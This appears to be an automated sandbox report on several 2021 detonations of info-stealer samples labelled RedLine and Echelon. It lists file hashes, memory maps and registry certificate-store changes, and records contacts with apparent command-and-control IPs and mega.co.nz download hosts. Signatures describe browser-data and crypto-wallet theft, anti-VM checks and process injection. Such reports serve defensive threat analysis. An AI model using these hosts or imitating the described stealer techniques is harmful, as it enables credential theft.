| SHA256 | 0281bbb85161fdb990c6f1c149a7e4bbaafe262f028e4fb66ffa995e2c4a45f3 |
| SHA512 | 870ef201fafd9d0036dcb4ea912676157075089390c9fecd0ad45d805e38bd74c5dc1fd413e9b765df50249628968ef8684b1b9ea57e2340769553e818c2159d |
memory/1608-124-0x0000000000000000-mapping.dmp
memory/3696-125-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\gg4359.bat
| MD5 | b4be21a8f4bb91b11ccaf08b39b679d5 |
| SHA1 | b3da567bb1072168b54866ee29301bde61bdc45e |
| SHA256 | 35e6fbd496632c91eb924e1d3b7749eeba36125bc4551624786b171bea1d465d |
| SHA512 | a52f7e9ad3ae76abe66920608c8b33a899ace0a4f4600903dc721a822114d5928cd85701a7405ef8ee1dc1aaa295174124a63ccec3e3fd3e347f01dbb2011f3c |
memory/1728-127-0x0000000000000000-mapping.dmp
memory/3868-128-0x0000000000000000-mapping.dmp
memory/1828-129-0x0000000000000000-mapping.dmp
memory/1796-130-0x0000000000000000-mapping.dmp
C:\NSpack\updIns\mmscx.exe
| MD5 | 3e79f72a8ae481ac76a69ccf1213d24d |
| SHA1 | de4fd0b5fc3ea6d2d095e1f492d12e14dd3aa7f2 |
| SHA256 | 1776cf6e4dfd98cc059403d5289b955c227a34fdffc43afe4a967468f2c117d4 |
| SHA512 | 2271bdc91dc5ffd388799fdd5016f1b3b0f81da9d62ac57631eced9539fbaca42e494c5edaf65e06194a150d4730ec292c5c97f45bf599a53ed80e5b41a0ae90 |
C:\NSpack\updIns\mmscx.exe
| MD5 | 3e79f72a8ae481ac76a69ccf1213d24d |
| SHA1 | de4fd0b5fc3ea6d2d095e1f492d12e14dd3aa7f2 |
| SHA256 | 1776cf6e4dfd98cc059403d5289b955c227a34fdffc43afe4a967468f2c117d4 |
| SHA512 | 2271bdc91dc5ffd388799fdd5016f1b3b0f81da9d62ac57631eced9539fbaca42e494c5edaf65e06194a150d4730ec292c5c97f45bf599a53ed80e5b41a0ae90 |
memory/2572-133-0x0000000000400000-0x0000000000434000-memory.dmp
memory/2572-134-0x000000000040CD2F-mapping.dmp
C:\NSpack\updIns\mmscx.exe
| MD5 | 3e79f72a8ae481ac76a69ccf1213d24d |
| SHA1 | de4fd0b5fc3ea6d2d095e1f492d12e14dd3aa7f2 |
| SHA256 | 1776cf6e4dfd98cc059403d5289b955c227a34fdffc43afe4a967468f2c117d4 |
| SHA512 | 2271bdc91dc5ffd388799fdd5016f1b3b0f81da9d62ac57631eced9539fbaca42e494c5edaf65e06194a150d4730ec292c5c97f45bf599a53ed80e5b41a0ae90 |
memory/2404-136-0x0000000000000000-mapping.dmp
memory/2572-137-0x0000000000400000-0x0000000000434000-memory.dmp
memory/344-138-0x0000000000000000-mapping.dmp
memory/2572-139-0x00000000020C0000-0x00000000020DD000-memory.dmp
memory/2228-140-0x0000000000000000-mapping.dmp
memory/2572-141-0x0000000004980000-0x0000000004981000-memory.dmp
memory/3516-142-0x0000000000000000-mapping.dmp
memory/2572-143-0x0000000004910000-0x000000000492B000-memory.dmp
memory/2572-144-0x0000000004E80000-0x0000000004E81000-memory.dmp
memory/2572-145-0x00000000054F0000-0x00000000054F1000-memory.dmp
memory/2572-146-0x0000000005510000-0x0000000005511000-memory.dmp
memory/2572-147-0x0000000005570000-0x0000000005571000-memory.dmp
memory/2572-148-0x0000000004970000-0x0000000004971000-memory.dmp
memory/2572-149-0x0000000004972000-0x0000000004973000-memory.dmp
memory/2572-150-0x0000000004973000-0x0000000004974000-memory.dmp
memory/2572-151-0x0000000004974000-0x0000000004976000-memory.dmp
memory/2572-152-0x0000000005700000-0x0000000005701000-memory.dmp
C:\NSpack\updIns\Sgsmmodul.com
| MD5 | 061f64173293969577916832be29b90d |
| SHA1 | b05b80385de20463a80b6c9c39bd1d53123aab9b |
| SHA256 | 34dfe4869b0a524c63cc4696fafe30c83a22dc5fe4b994b9fe777f2c986733ce |
| SHA512 | 66e284f7c7e40af988ab09ff48cc786d287ac906368042d98d313be764058f01ecb5c3a7ab8d4336ee6494ea4a1347e73f0f2b4f3baec25ca6bcec1d888bd3da |
memory/2572-154-0x00000000062E0000-0x00000000062E1000-memory.dmp
memory/2572-155-0x00000000064B0000-0x00000000064B1000-memory.dmp
memory/2572-156-0x0000000006BE0000-0x0000000006BE1000-memory.dmp
memory/2572-157-0x0000000007050000-0x0000000007051000-memory.dmp
memory/2572-158-0x00000000071A0000-0x00000000071A1000-memory.dmp
memory/2572-159-0x0000000007170000-0x0000000007171000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210408
Max time kernel
23s
Max time network
76s
Command Line
Signatures
Echelon
Echelon log file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\NewHacks.exe
"C:\Users\Admin\AppData\Local\Temp\NewHacks.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 18.118.55.110:50501 | tcp | |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 23.21.173.155:443 | api.ipify.org | tcp |
| N/A | 8.8.8.8:53 | ip-api.com | udp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| N/A | 66.203.125.12:443 | g.api.mega.co.nz | tcp |
| N/A | 8.8.8.8:53 | gfs270n074.userstorage.mega.co.nz | udp |
| N/A | 89.44.168.241:80 | gfs270n074.userstorage.mega.co.nz | tcp |
Files
memory/652-114-0x00000000003D0000-0x00000000003D1000-memory.dmp
memory/652-116-0x0000000000D00000-0x0000000000D02000-memory.dmp
memory/652-117-0x00000000028F0000-0x00000000028F1000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:56
Platform
win7v20210410
Max time kernel
34s
Max time network
77s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1816 set thread context of 1644 | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | C:\Users\Admin\AppData\Local\Temp\Setup.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
C:\Users\Admin\AppData\Local\Temp\Setup.exe
C:\Users\Admin\AppData\Local\Temp\Setup.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 185.92.73.140:80 | 185.92.73.140 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
Files
memory/1816-60-0x0000000075EF1000-0x0000000075EF3000-memory.dmp
memory/1816-61-0x0000000000DB0000-0x0000000000DB1000-memory.dmp
memory/1816-63-0x0000000000690000-0x0000000000691000-memory.dmp
memory/1816-64-0x00000000007A0000-0x00000000007C1000-memory.dmp
memory/1644-65-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1644-66-0x0000000000418E4E-mapping.dmp
memory/1644-68-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1644-70-0x0000000004D10000-0x0000000004D11000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:56
Platform
win7v20210410
Max time kernel
16s
Max time network
68s
Command Line
Signatures
Echelon
Echelon log file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95 | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\NewHacks.exe
"C:\Users\Admin\AppData\Local\Temp\NewHacks.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 54.235.190.106:443 | api.ipify.org | tcp |
| N/A | 8.8.8.8:53 | ip-api.com | udp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| N/A | 66.203.125.15:443 | g.api.mega.co.nz | tcp |
| N/A | 8.8.8.8:53 | gfs270n078.userstorage.mega.co.nz | udp |
| N/A | 89.44.168.219:80 | gfs270n078.userstorage.mega.co.nz | tcp |
Files
memory/1104-60-0x00000000000E0000-0x00000000000E1000-memory.dmp
memory/1104-62-0x000000001BD80000-0x000000001BD82000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210410
Max time kernel
32s
Max time network
123s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2208 set thread context of 3660 | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | C:\Users\Admin\AppData\Local\Temp\Setup.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
C:\Users\Admin\AppData\Local\Temp\Setup.exe
C:\Users\Admin\AppData\Local\Temp\Setup.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 185.92.73.140:80 | 185.92.73.140 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
Files
memory/2208-114-0x0000000000FA0000-0x0000000000FA1000-memory.dmp
memory/2208-116-0x0000000005C80000-0x0000000005C81000-memory.dmp
memory/2208-117-0x0000000005860000-0x0000000005861000-memory.dmp
memory/2208-118-0x0000000005780000-0x0000000005C7E000-memory.dmp
memory/2208-119-0x0000000005830000-0x0000000005831000-memory.dmp
memory/2208-120-0x0000000005A70000-0x0000000005A91000-memory.dmp
memory/3660-121-0x0000000000400000-0x000000000041E000-memory.dmp
memory/3660-122-0x0000000000418E4E-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Setup.exe.log
| MD5 | 9e7845217df4a635ec4341c3d52ed685 |
| SHA1 | d65cb39d37392975b038ce503a585adadb805da5 |
| SHA256 | d60e596ed3d5c13dc9f1660e6d870d99487e1383891437645c4562a9ecaa8c9b |
| SHA512 | 307c3b4d4f2655bdeb177e7b9c981ca27513618903f02c120caa755c9da5a8dd03ebab660b56108a680720a97c1e9596692490aede18cc4bd77b9fc3d8e68aa1 |
memory/3660-126-0x00000000054F0000-0x00000000054F1000-memory.dmp
memory/3660-127-0x0000000004F50000-0x0000000004F51000-memory.dmp
memory/3660-128-0x0000000004FB0000-0x0000000004FB1000-memory.dmp
memory/3660-129-0x0000000004FF0000-0x0000000004FF1000-memory.dmp
memory/3660-130-0x0000000004EE0000-0x00000000054E6000-memory.dmp
memory/3660-131-0x0000000005260000-0x0000000005261000-memory.dmp
memory/3660-132-0x0000000006160000-0x0000000006161000-memory.dmp
memory/3660-133-0x0000000006860000-0x0000000006861000-memory.dmp
memory/3660-134-0x00000000063E0000-0x00000000063E1000-memory.dmp
memory/3660-136-0x0000000006760000-0x0000000006761000-memory.dmp
memory/3660-138-0x0000000006DB0000-0x0000000006DB1000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:56
Platform
win7v20210408
Max time kernel
124s
Max time network
165s
Command Line
Signatures
RedLine
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Crystal.exe
"C:\Users\Admin\AppData\Local\Temp\Crystal.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 185.252.144.65:4545 | 185.252.144.65 | tcp |
